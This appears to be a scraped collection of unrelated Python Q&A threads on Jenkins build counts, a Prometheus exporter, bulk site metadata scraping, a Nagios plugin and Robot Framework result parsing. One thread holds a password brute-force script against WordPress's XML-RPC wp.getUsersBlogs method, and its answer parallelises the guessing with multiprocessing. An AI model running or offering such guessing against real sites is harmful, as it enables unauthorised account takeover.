I am trying to fetch status of all the builds for all my jobs.I have written a script it takes way too much time to execute.Is there anyway I can optimize the script? Any help will be appreciated.
def jenkinsconn():
server = jenkins.Jenkins('server',username=username,password=password)
jobs = server.get_jobs()
job_name_list=[]
build_number_list=[]
build_info_list=[]
status_list_dict={}
success=0
failure=0
unstable=0
aborted=0
#print dir(server)
for i in range(len(jobs)):
job_name=jobs[i]['name']
job_name_list.append(job_name)
for i in range(len(job_name_list)):
job_info=server.get_job_info(job_name_list[i])
lastbuilt=job_info['lastSuccessfulBuild']
if lastbuilt:
b_number=job_info['lastSuccessfulBuild']['number']
build_number_list.append(b_number)
build_zipped=zip(job_name_list,build_number_list)
for i ,j in build_zipped:
success=0
failure=0
unstable=0
aborted=0
for k in range(j):
build_info=server.get_build_info(i,k+1)
build_info_list.append(build_info)
status=build_info['result']
if status=="SUCCESS":
success+=1
elif status=="FAILURE":
failure+=1
elif status=="UNSTABLE":
unstable+=1
else:
aborted+=1
statuscount=[success,failure,unstable,aborted]
status_list_dict[i]=statuscount
If you only need the number of builds succeeding, failing, etc. then you can make do with one request per job, rather than a request per build like it looks like your code is doing. I can't find an method in the python-jenkins module to do this, but you can do it yourself with the Jenkins API.
Eg:
try: # Python 3
from urllib.request import urlopen
from urllib.parse import quote
except ImportError: # Python 2
from urllib2 import urlopen, quote
import json
import contextlib
status_list_dict = {}
with contextlib.closing(
urlopen("http://HOST_NAME:8080/api/json")
) as job_list_response:
job_list = json.load(job_list_response)["jobs"]
for job in job_list:
status_counts = [0,0,0,0]
with contextlib.closing(
urlopen(
"http://HOST_NAME:8080/job/{job_name}/api/json?tree=allBuilds[result]".format(
job_name=quote(job["name"])
)
)
) as build_list_response:
build_list = json.load(build_list_response)["allBuilds"]
for build_data in build_list:
if build_data["result"] == "SUCCESS":
status_counts[0] += 1
elif build_data["result"] == "FAILURE":
status_counts[1] += 1
elif build_data["result"] == "UNSTABLE":
status_counts[2] += 1
elif build_data["result"] == "ABORTED":
status_counts[3] += 1
status_list_dict[job["name"]] = status_counts
Related
I have written an exporter in Python that converts json to metrics from Prometheus. It works with few data, but when I test this with very many datasets whose spacing is miliseconds, it stops working.
JSON (extract):
{
"Acquisition": {
"refTriggerName": "NO_REF_TRIGGER",
"refTriggerStamp": 1666592215243657724,
"channelTimeSinceRefTrigger": [0e+00, 2.5e-04, ...]
"channelValues": {
"values": [4.861855e+00, 4.8581786e+00,
...}
json_exporter.py:
from prometheus_client import start_http_server, Metric, REGISTRY
import json
import requests
import sys
import time
class JsonCollector(object):
def __init__(self, endpoint):
self._endpoint = endpoint
def collect(self):
# Fetch the JSON
response = json.loads(requests.get(self._endpoint).content.decode('UTF-8'))
metric = Metric('fair_acquisition_signal', 'single sinus signal example', 'gauge')
valuesArray = response['Acquisition']['channelValues']['values']
refTriggerStamp = response['Acquisition']['refTriggerStamp']
timestampArray = response['Acquisition']['channelTimeSinceRefTrigger']
counter = 0
while(counter < len(valuesArray)) and (counter < len(timestampArray)):
timestampV = refTriggerStamp/ 1e9 + timestampArray[counter]
metric.add_sample('fair_acquisition_signal', value=valuesArray[counter], timestamp=timestampV, labels={})
#print(str(datetime.fromtimestamp(timstampV)) + ' ' + str(valuesArray[counter]))
counter += 1
#for sample in metric.samples:
# print(sample)
#print(str(len(metric.samples)))
yield metric
if __name__ == '__main__':
# Usage: json_exporter.py port endpoint
start_http_server(int(sys.argv[1]))
REGISTRY.register(JsonCollector(sys.argv[2]))
while True: time.sleep(1)
The data should actually result in a sinus, but in Prometheus it looks like this.
visualization in Prometheus:
prometheus visualization
Does anyone know where my error is?
Is there a possible way to speed up my code using multiprocessing interface?
i have data array that include password i would like to run some requests togther.
import requests
data = ['test','test1','test2']
counter=0
for x in data:
counter+=1
burp0_data = "<methodCall>\r\n<methodName>wp.getUsersBlogs</methodName>\r\n<params>\r\n<param>
<value>zohar</value></param>\r\n<param><value>"+x+"</value>
</param>\r\n</params>\r\n</methodCall>\r\n"
s=requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
if not (s.text.__contains__("403")):
print(s.text)
print(x)
exit()
Python multiprocessing module is what you are looking for. For instance, it has a parallel map function, which will run all requests asynchronously. Here is roughly what your code would look like:
import requests
from multiprocessing import Pool
def post(x):
burp0_data = "<methodCall>\r\n<methodName>wp.getUsersBlogs</methodName>\r\n<params>\r\n<param>
<value>zohar</value></param>\r\n<param><value>"+x+"</value>
</param>\r\n</params>\r\n</methodCall>\r\n"
s=requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
if not (s.text.__contains__("403")):
return s.text, x
return None, None
if __name__ == '__main__':
data = ['test','test1','test2']
counter=0
with Pool(processes=len(data)) as pool:
results = pool.map(post, data, 1)
for res in results:
if res[0] is not None:
print(res[0])
print(res[1])
exit()
For more information please refer to the Python docs on multiprocessing.
Hi all,
I'm trying to parse the metadata of 10,000 websites into a Pandas dataframe for an SEO / analytics application but the code is taking ages. I've been trying to do it on 1,000 websites and the code has been running for the last 3 hours (it works without problem on 10-50 websites).
Here's the sample data:
index site
0 http://www.google.com
1 http://www.youtube.com
2 http://www.facebook.com
3 http://www.cnn.com
... ...
10000 http://www.sony.com
Here's my Python (2.7) code:
# Importing dependencies
import pandas as pd
import numpy as np
import requests
from bs4 import BeautifulSoup
import metadata_parser
# Loading the Pandas dataframe
df = pd.read_csv('final_urls')
# Utility functions
def meta(website, metadata):
full_url = website
parser = metadata_parser.MetadataParser(url=full_url)
if metadata == 'all':
return parser.metadata
else:
return parser.metadata[metadata]
def meta_all(website):
try:
result = meta(website, 'all')
except BaseException:
result = 'Exception'
return result
# Main
df['site'].apply(meta_all)
I'd like the code to be much faster. I've been using the metadata_parser library (https://github.com/jvanasco/metadata_parser) which relies heavily on requests and BeautifulSoup.
I understand I might be able to change the parser to lxml for the code to be faster. It's already installed on my machine so BeautifulSoup should use it as the primary choice.
Do you have any suggestion to get this code to run faster?
Thanks!
You can use Python Twisted (Twisted is an event-driven networking engine written in Python). You will need to install a few packages with pip, maybe twisted, pyopenssl and service_identity maybe others. This code works on Python 2.7 which you say you are using.
from twisted.internet import defer, reactor
from twisted.web.client import getPage
import metadata_parser
import pandas as pd
import numpy as np
from multiprocessing import Process
def pageCallback(result, url):
data = {
'content': result,
'url': url,
}
return data
def getPageData(url):
d = getPage(url)
d.addCallback(pageCallback, url)
return d
def listCallback(result):
for isSuccess, data in result:
if isSuccess:
print("Call to %s succeeded " % (data['url']))
parser = metadata_parser.MetadataParser(html=data['content'], search_head_only=False)
print(parser.metadata) # do something with it here
def finish(ign):
reactor.stop()
def start(urls):
data = []
for url in urls:
data.append(getPageData(url))
dl = defer.DeferredList(data)
dl.addCallback(listCallback)
dl.addCallback(finish)
def processStart(chunk):
start(chunk)
reactor.run()
df = pd.read_csv('final_urls')
urls = df['site'].values.tolist()
chunkCounter = 0
chunkLength = 1000
for chunk in np.array_split(urls,len(urls)/chunkLength):
p = Process(target=processStart, args=(chunk,))
p.start()
p.join()
chunkCounter += 1
print("Finished chunk %s of %s URLs" % (str(chunkCounter), str(chunkLength)))
I have run it on 10,000 URLs and it took less than 16 minutes.
Updated
Normally you would process the data you generated where I added the comment "# do something with it here". In the event you want the generated data returned back for processing you can do something like this (I have also updated to use treq.):
from twisted.internet import defer, reactor
import treq
import metadata_parser
import pandas as pd
import numpy as np
import multiprocessing
from twisted.python import log
import sys
# log.startLogging(sys.stdout)
results = []
def pageCallback(result, url):
content = result.content()
data = {
'content': content,
'url': url,
}
return data
def getPageData(url):
d = treq.get(url, timeout=60, headers={'User-Agent': ["Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv'\:'57.0) Gecko/20100101 Firefox/57.0"]})
d.addCallback(pageCallback, url)
return d
def listCallback(result):
global results
for isSuccess, data in result:
if isSuccess:
print("Call to %s succeeded " % (data['url']))
parser = metadata_parser.MetadataParser(html=str(data['content']), search_head_only=False)
# print(parser.metadata) # do something with it here
results.append((data['url'], parser.metadata))
def finish(ign):
reactor.stop()
def start(urls):
data = []
for url in urls:
data.append(getPageData(url))
dl = defer.DeferredList(data)
dl.addCallback(listCallback)
dl.addCallback(finish)
def processStart(chunk, returnList):
start(chunk)
reactor.run()
returnList.extend(results)
df = pd.read_csv('final_urls')
urls = df['site'].values.tolist()
chunkCounter = 0
chunkLength = 1000
manager = multiprocessing.Manager()
returnList = manager.list()
for chunk in np.array_split(urls,len(urls)/chunkLength):
p = multiprocessing.Process(target=processStart, args=(chunk,returnList))
p.start()
p.join()
chunkCounter += 1
print("Finished chunk %s of %s URLs" % (str(chunkCounter), str(chunkLength)))
for res in returnList:
print (res)
print (len(returnList))
You may also want to add some error handling, to help you can uncomment the line reading "log.startLogging(sys.stdout)" but this is too much detail for one answer. If you get some failures for URLs I would generally retry them by running the code again with just the failed URLs possibly a few times if necessary.
I am writing a small python script that iterates through a large json output and grabs the information I need and puts it into small dictionaries. It then iterates through the dictionaries to look for an key called restartcount. If the count is more than more than 3 but less than 5 it prints warning. If greater than 5 it prints critical. However this script is set to be a nagios plugin which requires exit codes to be placed with warning sys.exit(1), and sys.exit(2) for critical. If you look at my script I use my function to grab the info I need into a small dictionary, then run a for loop. If I place a sys.exit after inside any if statement I iterate only through the first dictionary and the rest are not checked. Any help will be appreciated as to how to incorporate the exit codes without losing skipping or missing any information.
Code:
import urllib2
import json
import argparse
from sys import exit
def get_content(pod):
kube = {}
kube['name'] = pod["metadata"]["name"]
kube['phase'] = pod["status"]["phase"]
kube['restartcount'] = pod["status"]["containerStatuses"][0]["restartCount"]
return kube
if __name__ == '__main__':
parser = argparse.ArgumentParser( description='Monitor Kubernetes Pods' )
parser.add_argument('-w', '--warning', type=int, help='levels we should look into',default=3)
parser.add_argument('-c', '--critical', type=int, help='its gonna explode',default=5)
parser.add_argument('-p', '--port', type=int, help='port to access api server',default=8080)
args = parser.parse_args()
try:
api_call = "http://localhost:{}/api/v1/namespaces/default/pods/".format(args.port)
req = urllib2.urlopen(api_call).read()
content = json.loads(req)
except urllib2.URLError:
print 'URL Error. Please re-check the API call'
exit(2)
for pods in content.get("items"):
try:
block = get_content(pods)
print block
except KeyError:
print 'Container Failed'
exit(2)
if block["restartcount"] >= args.warning and block["restartcount"] < args.critical:
print "WARNING | {} restart count is {}".format(block["name"], block["restartcount"])
if block["restartcount"] >= args.critical:
print "CRITICAL | {} restart count is {}".format(block["name"], block["restartcount"])
what the block variable looks like:
{'phase': u'Running', 'restartcount': 0, 'name': u'pixels-1.0.9-k1v5u'}
Create a variable called something like exit_status. Initialize it to 0, and set it as needed in your code (e.g. where you are currently calling exit). At the end of program execution, call sys.exit(exit_status) (and no where else).
Rewriting the last section of your code:
exit_status = 0
for pods in content.get("items"):
try:
block = get_content(pods)
print block
except KeyError:
print 'Container Failed'
exit(2)
if block["restartcount"] >= args.warning and block["restartcount"] < args.critical:
print "WARNING | {} restart count is {}".format(block["name"], block["restartcount"])
if exit_status < 1: exit_status = 1
if block["restartcount"] >= args.critical:
print "CRITICAL | {} restart count is {}".format(block["name"], block["restartcount"])
exit_status = 2
sys.exit(exit_status)
The variable approach is correct
Problem is that as you check further you probably set it to 1 when it was already 2 so I would suggest add here a condition not to set it to 1 if it is already 2
I want to filter failure messages from output files generated after executing my testcases in Robot Framework. I have tried modules like from robot.api import ExecutionResult but it gives me only only count of Passed and Failed Testcases.
I have also tried other Robot framework Libtraries like import robot.errors to filter out all error messages but didn't get any luck. Below is my code block:
`
#!/usr/bin/python
from robot.api import ExecutionResult
import robot.errors
from robot.result.visitor import ResultVisitor
xmlpath = "<output.xml PATH>"
result = ExecutionResult(xmlpath)
result.configure(stat_config={'suite_stat_level': 2,
'tag_stat_combine': 'tagANDanother'})
stats = result.statistics
print stats.total.critical.failed
print stats.total.critical.passed
print stats.total.critical.passed + stats.total.critical.failed
class FailureCollector(ResultVisitor):
def __init__(self):
self.failures = []
def visit_test(self, test):
if not test.passed:
self.failures += [test]
failure_collector = FailureCollector()
result.visit(failure_collector)
print failure_collector.failures
#the above print gives me all failed testcases as a list Eg: ['test1:My example Testcase1','test2:My example Testcase2' ]`
Any example to get this work done will be very helpful.
I have tried a lot to get my expected output by using Robot Framework APIs but didn't get proper solution. Finally I got my solution by using import xml.etree.ElementTree as ET module. By using xml.etree.ElementTree module I am parsing my robot result.xml file and getting my work done.
`
import xml.etree.ElementTree as ET
import re
tree = ET.parse('<output.xml file Path>')
root = tree.getroot()
testplans = <Testplans as a list>
i = 0
err_dict = {}
for testplan in testplans:
full_err_list = []
err_list = []
for suite_level_1 in root:
try:
if suite_level_1.tag == "suite":
for suite_level_2 in suite_level_1:
if suite_level_2.tag == "suite" and suite_level_2.attrib['name'] == testplan:
for suite_level_3 in suite_level_2:
if suite_level_3.tag == "suite":
for test in suite_level_3:
if test.tag == "test":
for kw_level_5 in test:
if kw_level_5.tag == "kw" and kw_level_5.attrib['name'] == '<specific keyword under which you expect your result(error or Success message >':
for msg in kw_level_5:
if msg.tag == 'msg':
err_str = msg.text
#print err_str
mat = re.match(r'\$\{FinalResult\}\s=\s(.*)',err_str)
if mat and mat.group(1) != 'Succeeded.':
i=i+1
#print mat.group(1), i
err = mat.group(1)
full_err_list.append(err)
if err not in err_list:
err_list.append(err)
except:
print "Errors found"
break
err_dict[testplan] = err_list
print "\n########## "+testplan+" ##########\n"
print "Total no of failures", len(full_err_list)
for err_name in err_list:
print err_name, "===>>", full_err_list.count(err_name)
##The above will print the error name and its count in specific testPlan`